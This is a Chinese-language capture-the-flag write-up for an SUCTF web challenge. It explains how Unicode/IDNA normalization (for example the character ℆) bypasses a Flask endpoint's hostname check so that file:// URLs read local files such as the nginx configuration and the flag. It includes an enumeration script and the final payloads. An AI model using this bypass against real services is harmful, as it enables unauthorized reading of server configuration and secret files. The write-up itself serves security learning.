@app.route('/getUrl', methods=['GET', 'POST']) def getUrl(): url = request.args.get("url") host = parse.urlparse(url).hostname if host == 'suctf.cc': return "我扌 your problem? 111" parts = list(urlsplit(url)) host = parts[1] if host == 'suctf.cc': return "我扌 your problem? 222 " + host newhost = [] for h in host.split('.'): newhost.append(h.encode('idna').decode('utf-8')) parts[1] = '.'.join(newhost) #去掉 url 中的空格 finalUrl = urlunsplit(parts).split(' ')[0] host = parse.urlparse(finalUrl).hostname if host == 'suctf.cc': return urllib.request.urlopen(finalUrl).read() else: return "我扌 your problem? 333" <!-- Dont worry about the suctf.cc. Go on! --> <!-- Do you know the nginx? -->
nginx配置
配置文件存放目录:/etc/nginx 主配置文件:/etc/nginx/conf/nginx.conf 管理脚本:/usr/lib64/systemd/system/nginx.service 模块:/usr/lisb64/nginx/modules 应用程序:/usr/sbin/nginx 程序默认存放位置:/usr/share/nginx/html 日志默认存放位置:/var/log/nginx 配置文件目录为:/usr/local/nginx/conf/nginx.conf
ps: 现在nginx网站配置从nginx.conf转到同目录文件夹下的default.config
寻找可用字符:
# coding:utf-8 for i in range(128,65537): tmp=chr(i) try: res = tmp.encode('idna').decode('utf-8') if("-") in res: continue print("U:{} A:{} ascii:{} ".format(tmp, res, i)) except: pass
根据题意可知,他的url很大可能是suctf.cc
加上提示的nginx找配置文件就能找到flag的路径
由此可以想到构造:file://suctf.c℆sr/local/nginx/conf/nginx.conf(另一种绕过方式是利用ℂ来代替c及进行绕过)
最后构造payload:file://suctf.c℆sr/fffffflag